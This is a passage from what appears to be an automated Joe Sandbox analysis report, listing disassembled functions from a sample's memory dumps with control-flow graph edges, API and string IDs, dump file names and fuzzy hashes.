                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE003D7200 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                      • String ID: TLS 1.1
                                                                                                                                                                      • API String ID: 3300690313-2459780185
                                                                                                                                                                      • Opcode ID: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
                                                                                                                                                                      • Instruction ID: 8cc6cd70e0caa9c91c867747a4d418e9ab7131b488bb240d85a6f6f0e6c1d55b
                                                                                                                                                                      • Opcode Fuzzy Hash: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
                                                                                                                                                                      • Instruction Fuzzy Hash: EC62086262C5928AE7268E38E84027D7791F748785F045536EBDEC37E8FA7CEA45C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1A8290 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 522COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1140 7ffdff1a8290-7ffdff1a831b 1141 7ffdff1a8474-7ffdff1a848a 1140->1141 1142 7ffdff1a8321-7ffdff1a832b 1140->1142 1144 7ffdff1a8386-7ffdff1a83cc call 7ffdff1956a0 1141->1144 1145 7ffdff1a8490-7ffdff1a8496 1141->1145 1142->1141 1143 7ffdff1a8331-7ffdff1a8334 1142->1143 1143->1145 1148 7ffdff1a833a 1143->1148 1153 7ffdff1a8a74-7ffdff1a8a77 1144->1153 1154 7ffdff1a83d2-7ffdff1a8436 00007FFE1A4519C0 1144->1154 1145->1144 1146 7ffdff1a849c-7ffdff1a84b2 call 7ffdff1956a0 1145->1146 1156 7ffdff1a84b8-7ffdff1a84d4 1146->1156 1157 7ffdff1a8ad4 1146->1157 1151 7ffdff1a8341-7ffdff1a834a 1148->1151 1151->1151 1155 7ffdff1a834c-7ffdff1a835b call 7ffdff1956a0 1151->1155 1153->1157 1161 7ffdff1a8a79-7ffdff1a8a80 1153->1161 1158 7ffdff1a843c-7ffdff1a8458 call 7ffdff2bda84 1154->1158 1159 7ffdff1a8671-7ffdff1a868c 1154->1159 1155->1157 1173 7ffdff1a8361-7ffdff1a8370 call 7ffdff2bda84 1155->1173 1178 7ffdff1a84d6-7ffdff1a84e3 1156->1178 1179 7ffdff1a84ea 1156->1179 1163 7ffdff1a8ad9-7ffdff1a8ae9 1157->1163 1180 7ffdff1a861c 1158->1180 1181 7ffdff1a845e-7ffdff1a846f call 7ffdff2bda84 1158->1181 1164 7ffdff1a86ee-7ffdff1a8708 1159->1164 1165 7ffdff1a868e-7ffdff1a8691 1159->1165 1166 7ffdff1a8acb 1161->1166 1167 7ffdff1a8a82-7ffdff1a8a8c 1161->1167 1171 7ffdff1a8825 1164->1171 1172 7ffdff1a870e-7ffdff1a8713 1164->1172 1165->1164 1174 7ffdff1a8693-7ffdff1a869a 1165->1174 1166->1157 1175 7ffdff1a8a8e 1167->1175 1176 7ffdff1a8a94-7ffdff1a8ac1 1167->1176 1182 7ffdff1a882a-7ffdff1a8838 1171->1182 1172->1171 1185 7ffdff1a8719-7ffdff1a8745 call 7ffdff19ef40 1172->1185 1195 7ffdff1a8377-7ffdff1a837e 1173->1195 1183 7ffdff1a86e5 1174->1183 1184 7ffdff1a869c-7ffdff1a86a6 1174->1184 1175->1176 1176->1157 1214 7ffdff1a8ac3-7ffdff1a8ac9 1176->1214 1178->1179 1191 7ffdff1a84f1-7ffdff1a84f8 1179->1191 1190 7ffdff1a861f-7ffdff1a866f call 7ffdff2bda84 * 2 1180->1190 1181->1190 1192 7ffdff1a883b-7ffdff1a883e 1182->1192 1183->1164 1187 7ffdff1a86a8 1184->1187 1188 7ffdff1a86ae-7ffdff1a86db 1184->1188 1194 7ffdff1a8748-7ffdff1a8768 1185->1194 1187->1188 1188->1164 1231 7ffdff1a86dd-7ffdff1a86e3 1188->1231 1190->1165 1191->1191 1196 7ffdff1a84fa-7ffdff1a8508 1191->1196 1199 7ffdff1a88ee-7ffdff1a88f8 1192->1199 1200 7ffdff1a8844-7ffdff1a885d call 7ffdff1a7800 1192->1200 1201 7ffdff1a8820-7ffdff1a8823 1194->1201 1202 7ffdff1a876e-7ffdff1a8778 1194->1202 1195->1195 1203 7ffdff1a8380 1195->1203 1209 7ffdff1a8510-7ffdff1a8517 1196->1209 1206 7ffdff1a8906-7ffdff1a8919 call 7ffdff1a3670 1199->1206 1207 7ffdff1a88fa-7ffdff1a8903 1199->1207 1200->1199 1218 7ffdff1a8863-7ffdff1a88e8 1200->1218 1201->1192 1212 7ffdff1a877a-7ffdff1a877c 1202->1212 1213 7ffdff1a877e-7ffdff1a8781 1202->1213 1203->1144 1234 7ffdff1a8a66-7ffdff1a8a72 1206->1234 1235 7ffdff1a891f-7ffdff1a8929 1206->1235 1207->1206 1209->1209 1215 7ffdff1a8519-7ffdff1a8530 1209->1215 1219 7ffdff1a8783-7ffdff1a878b 1212->1219 1213->1219 1214->1157 1224 7ffdff1a8587-7ffdff1a858e 1215->1224 1225 7ffdff1a8532-7ffdff1a8536 1215->1225 1246 7ffdff1a894c-7ffdff1a8952 1218->1246 1247 7ffdff1a88ea 1218->1247 1229 7ffdff1a87af-7ffdff1a87c5 call 7ffdff251c90 1219->1229 1230 7ffdff1a878d-7ffdff1a87a1 call 7ffdff1a6960 1219->1230 1226 7ffdff1a8590-7ffdff1a8598 1224->1226 1227 7ffdff1a85b3-7ffdff1a85ba 1224->1227 1233 7ffdff1a8540-7ffdff1a8547 1225->1233 1226->1144 1237 7ffdff1a859e-7ffdff1a85ad call 7ffdff250d40 1226->1237 1238 7ffdff1a860b 1227->1238 1239 7ffdff1a85bc-7ffdff1a85c6 1227->1239 1262 7ffdff1a87c7-7ffdff1a87db call 7ffdff20a9f0 1229->1262 1263 7ffdff1a87dd 1229->1263 1230->1229 1261 7ffdff1a87a3-7ffdff1a87a8 1230->1261 1231->1164 1244 7ffdff1a8550-7ffdff1a8559 1233->1244 1234->1163 1241 7ffdff1a892b 1235->1241 1242 7ffdff1a8931-7ffdff1a8944 1235->1242 1237->1144 1237->1227 1260 7ffdff1a8614-7ffdff1a8617 1238->1260 1248 7ffdff1a85c8 1239->1248 1249 7ffdff1a85ce-7ffdff1a85fb 1239->1249 1241->1242 1242->1246 1244->1244 1254 7ffdff1a855b-7ffdff1a8569 1244->1254 1257 7ffdff1a897b-7ffdff1a898b 1246->1257 1258 7ffdff1a8954-7ffdff1a8977 1246->1258 1247->1199 1248->1249 1249->1260 1279 7ffdff1a85fd-7ffdff1a8606 1249->1279 1256 7ffdff1a8570-7ffdff1a8579 1254->1256 1256->1256 1264 7ffdff1a857b-7ffdff1a8585 1256->1264 1273 7ffdff1a898d 1257->1273 1274 7ffdff1a8993-7ffdff1a89c4 1257->1274 1258->1257 1260->1163 1261->1229 1265 7ffdff1a87df-7ffdff1a87e4 1262->1265 1263->1265 1264->1224 1264->1233 1269 7ffdff1a8818-7ffdff1a881e 1265->1269 1270 7ffdff1a87e6-7ffdff1a87fc call 7ffdff251c90 1265->1270 1269->1182 1270->1201 1280 7ffdff1a87fe-7ffdff1a8816 call 7ffdff20a9f0 1270->1280 1273->1274 1277 7ffdff1a89d7-7ffdff1a89de 1274->1277 1278 7ffdff1a89c6-7ffdff1a89d5 1274->1278 1281 7ffdff1a89e2-7ffdff1a8a07 call 7ffdff1a6960 1277->1281 1278->1281 1279->1163 1280->1201 1280->1269 1287 7ffdff1a8a09-7ffdff1a8a0d 1281->1287 1288 7ffdff1a8a0f-7ffdff1a8a12 1281->1288 1289 7ffdff1a8a1d-7ffdff1a8a2f 1287->1289 1290 7ffdff1a8a19 1288->1290 1291 7ffdff1a8a14-7ffdff1a8a17 1288->1291 1292 7ffdff1a8a3a-7ffdff1a8a4c 1289->1292 1293 7ffdff1a8a31-7ffdff1a8a38 1289->1293 1290->1289 1291->1289 1291->1290 1294 7ffdff1a8a50-7ffdff1a8a64 1292->1294 1293->1294 1294->1163
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: -journal$immutable$nolock
                                                                                                                                                                      • API String ID: 817585512-4201244970
                                                                                                                                                                      • Opcode ID: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
                                                                                                                                                                      • Instruction ID: 36a4c66b788f443fc83f942c39ccf858ac520805bbb7dbf17425a1e4da624a25
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
                                                                                                                                                                      • Instruction Fuzzy Hash: BD327B63B0968286EB658F259460B7937A1FF44BA4F084335CA7E8B7D8EF3CE4558304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF211850 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 369COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1296 7ffdff211850-7ffdff211929 00007FFE1A4519C0 1297 7ffdff211949-7ffdff21194f 1296->1297 1298 7ffdff21192b-7ffdff211944 call 7ffdff199d60 1296->1298 1300 7ffdff211951-7ffdff21195b 1297->1300 1301 7ffdff211962-7ffdff21196a 1297->1301 1305 7ffdff211dbc-7ffdff211dea call 7ffdff2115a0 call 7ffdff2bcad0 1298->1305 1300->1301 1303 7ffdff211970-7ffdff211976 1301->1303 1304 7ffdff211a41-7ffdff211a49 1301->1304 1308 7ffdff211a3c 1303->1308 1309 7ffdff21197c-7ffdff21197f 1303->1309 1306 7ffdff211a53-7ffdff211a56 1304->1306 1307 7ffdff211a4b-7ffdff211a4e call 7ffdff22a390 1304->1307 1312 7ffdff211afd-7ffdff211b05 call 7ffdff24b410 1306->1312 1313 7ffdff211a5c-7ffdff211a5f 1306->1313 1307->1306 1308->1304 1314 7ffdff211980-7ffdff21198c 1309->1314 1321 7ffdff211b0a-7ffdff211b0d 1312->1321 1317 7ffdff211a6d-7ffdff211a74 1313->1317 1318 7ffdff211a61-7ffdff211a67 1313->1318 1319 7ffdff2119fe-7ffdff211a09 1314->1319 1320 7ffdff21198e-7ffdff211992 1314->1320 1325 7ffdff211a9e-7ffdff211aa1 1317->1325 1326 7ffdff211a76-7ffdff211a99 call 7ffdff199bc0 call 7ffdff196260 1317->1326 1318->1312 1318->1317 1322 7ffdff211a37 1319->1322 1323 7ffdff211a0b-7ffdff211a0d 1319->1323 1327 7ffdff211994-7ffdff21199b 1320->1327 1328 7ffdff2119a7-7ffdff2119af 1320->1328 1331 7ffdff211b0f-7ffdff211b16 1321->1331 1332 7ffdff211b19-7ffdff211b25 1321->1332 1322->1308 1323->1314 1334 7ffdff211af0-7ffdff211afb 1325->1334 1335 7ffdff211aa3-7ffdff211ab5 call 7ffdff195dc0 1325->1335 1326->1305 1327->1328 1330 7ffdff21199d-7ffdff2119a5 call 7ffdff1ae670 1327->1330 1328->1319 1333 7ffdff2119b1-7ffdff2119b8 1328->1333 1330->1328 1331->1332 1339 7ffdff211b27-7ffdff211b33 1332->1339 1340 7ffdff211b8a-7ffdff211b8e 1332->1340 1341 7ffdff2119c7-7ffdff2119ce 1333->1341 1342 7ffdff2119ba-7ffdff2119be 1333->1342 1334->1321 1335->1334 1360 7ffdff211ab7-7ffdff211aee call 7ffdff2bda84 call 7ffdff24b410 call 7ffdff195930 1335->1360 1339->1340 1348 7ffdff211b35-7ffdff211b3f 1339->1348 1346 7ffdff211b90-7ffdff211b9e 1340->1346 1347 7ffdff211ba3-7ffdff211ba9 1340->1347 1351 7ffdff2119d0-7ffdff2119d3 1341->1351 1352 7ffdff2119ea 1341->1352 1342->1341 1349 7ffdff2119c0-7ffdff2119c5 1342->1349 1354 7ffdff211cd8-7ffdff211cdb 1346->1354 1355 7ffdff211baf-7ffdff211bb2 1347->1355 1356 7ffdff211d55-7ffdff211d73 1347->1356 1357 7ffdff211b41 1348->1357 1358 7ffdff211b4b-7ffdff211b51 1348->1358 1359 7ffdff2119ec-7ffdff2119f0 1349->1359 1361 7ffdff2119e1-7ffdff2119e8 1351->1361 1362 7ffdff2119d5-7ffdff2119d9 1351->1362 1352->1359 1363 7ffdff211cdd-7ffdff211ce4 1354->1363 1364 7ffdff211cf6-7ffdff211d02 1354->1364 1355->1356 1365 7ffdff211bb8-7ffdff211bbd 1355->1365 1366 7ffdff211d93-7ffdff211d9a 1356->1366 1367 7ffdff211d75-7ffdff211d7e 1356->1367 1357->1358 1368 7ffdff211b53-7ffdff211b65 call 7ffdff195dc0 1358->1368 1369 7ffdff211b7c 1358->1369 1372 7ffdff2119f2-7ffdff2119f5 call 7ffdff1ae640 1359->1372 1373 7ffdff2119fa-7ffdff2119fc 1359->1373 1360->1321 1361->1351 1361->1352 1362->1361 1371 7ffdff2119db-7ffdff2119df 1362->1371 1376 7ffdff211cee-7ffdff211cf1 call 7ffdff1c3aa0 1363->1376 1377 7ffdff211ce6-7ffdff211ce9 call 7ffdff1c3930 1363->1377 1383 7ffdff211d04-7ffdff211d1d call 7ffdff199bc0 1364->1383 1384 7ffdff211d29-7ffdff211d32 1364->1384 1365->1354 1378 7ffdff211bc3-7ffdff211bca 1365->1378 1366->1305 1385 7ffdff211d9c 1366->1385 1379 7ffdff211d80-7ffdff211d88 call 7ffdff1be5a0 1367->1379 1380 7ffdff211d8a-7ffdff211d8f 1367->1380 1374 7ffdff211b7e-7ffdff211b85 1368->1374 1405 7ffdff211b67-7ffdff211b7a call 7ffdff2bda84 1368->1405 1369->1374 1371->1349 1371->1361 1372->1373 1373->1319 1375 7ffdff211a12-7ffdff211a32 call 7ffdff199bc0 1373->1375 1374->1340 1375->1305 1376->1364 1377->1376 1378->1354 1388 7ffdff211bd0-7ffdff211bdc 1378->1388 1379->1366 1380->1366 1383->1366 1410 7ffdff211d1f-7ffdff211d27 call 7ffdff195930 1383->1410 1392 7ffdff211d34-7ffdff211d3c 1384->1392 1393 7ffdff211d47-7ffdff211d53 call 7ffdff199ae0 1384->1393 1397 7ffdff211da0-7ffdff211dba call 7ffdff195930 1385->1397 1388->1354 1402 7ffdff211be2-7ffdff211bec 1388->1402 1392->1393 1399 7ffdff211d3e-7ffdff211d45 1392->1399 1393->1366 1397->1305 1399->1366 1408 7ffdff211bf0-7ffdff211c04 1402->1408 1405->1374 1413 7ffdff211cbd-7ffdff211cc8 1408->1413 1414 7ffdff211c0a-7ffdff211c0e 1408->1414 1410->1366 1413->1408 1418 7ffdff211cce-7ffdff211cd3 1413->1418 1419 7ffdff211c10-7ffdff211c22 call 7ffdff1b1fa0 1414->1419 1420 7ffdff211c48-7ffdff211c50 1414->1420 1418->1354 1433 7ffdff211c24-7ffdff211c29 1419->1433 1434 7ffdff211c2b-7ffdff211c33 call 7ffdff196180 1419->1434 1422 7ffdff211c52-7ffdff211c59 1420->1422 1423 7ffdff211c63-7ffdff211c76 1420->1423 1422->1423 1426 7ffdff211c5b-7ffdff211c5e call 7ffdff1ae670 1422->1426 1427 7ffdff211c86-7ffdff211c92 1423->1427 1428 7ffdff211c78-7ffdff211c7c 1423->1428 1426->1423 1431 7ffdff211cae-7ffdff211cb3 1427->1431 1432 7ffdff211c94-7ffdff211ca9 call 7ffdff1ee260 1427->1432 1428->1427 1430 7ffdff211c7e-7ffdff211c81 call 7ffdff1ae640 1428->1430 1430->1427 1431->1413 1435 7ffdff211cb5-7ffdff211cb8 call 7ffdff1b3300 1431->1435 1432->1431 1433->1434 1436 7ffdff211c37-7ffdff211c3a 1433->1436 1434->1436 1435->1413 1436->1418 1442 7ffdff211c40 1436->1442 1442->1420
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                      • API String ID: 817585512-1046679716
                                                                                                                                                                      • Opcode ID: 0debb23e3739cc449da5461e64965afd84d721c678890d73669033abb012c6c3
                                                                                                                                                                      • Instruction ID: 55c6a51e9f19c6a899c261ec06451edc8bd2fccaa6de79fd90d145077045ecbe
                                                                                                                                                                      • Opcode Fuzzy Hash: 0debb23e3739cc449da5461e64965afd84d721c678890d73669033abb012c6c3
                                                                                                                                                                      • Instruction Fuzzy Hash: D7F1A222F0C68696EB258F219420BBA67A4FB85B88F180235DA7D877DDDF7CE540C744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFB287B30 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2039068428.00007FFDFB287000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FFDFAD90000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2038212514.00007FFDFAD90000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFAD91000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFADA2000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFADB2000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFADB8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFAE02000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFAE17000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFAE27000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFAE2E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFAE3C000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB0F9000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB0FB000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB132000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB172000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB1CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB23A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB26F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038251187.00007FFDFB281000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2039113179.00007FFDFB289000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfad90000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3300690313-0
                                                                                                                                                                      • Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                      • Instruction ID: 680b689bdcfa64395e07cba39fcb8b2638390edcb0cd0a6b1de16b4346968876
                                                                                                                                                                      • Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C62372272999286E725CF38D81067D7790F758785F049532EBAEC77E8EA3CEA45C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1B0A50 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007B5630
                                                                                                                                                                      • String ID: :memory:
                                                                                                                                                                      • API String ID: 2248877218-2920599690
                                                                                                                                                                      • Opcode ID: 91b0e484d977521e88cb554add3d4ba898cd67a262d1f5dc198e376bfc7720f5
                                                                                                                                                                      • Instruction ID: 5441cbfc2490344032a9a2e534754d5dd979fba25839e4c1ec8facf3d014780e
                                                                                                                                                                      • Opcode Fuzzy Hash: 91b0e484d977521e88cb554add3d4ba898cd67a262d1f5dc198e376bfc7720f5
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B424B23F09786C2EB648B259564B7927A0FF85B88F154235DB7E967E8DF3CE4948300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1A0180 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                                                      • Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                      • Instruction ID: c89f6d2fa34890324986958fb247d640aa71ff17d22af00e29db7f36bca2d536
                                                                                                                                                                      • Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                      • Instruction Fuzzy Hash: 17A1E762F0AB4786EF548B55A874B3823A0BF55B44F640739C93D8F7E8EF7CA5958200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF19EF40 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 412fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
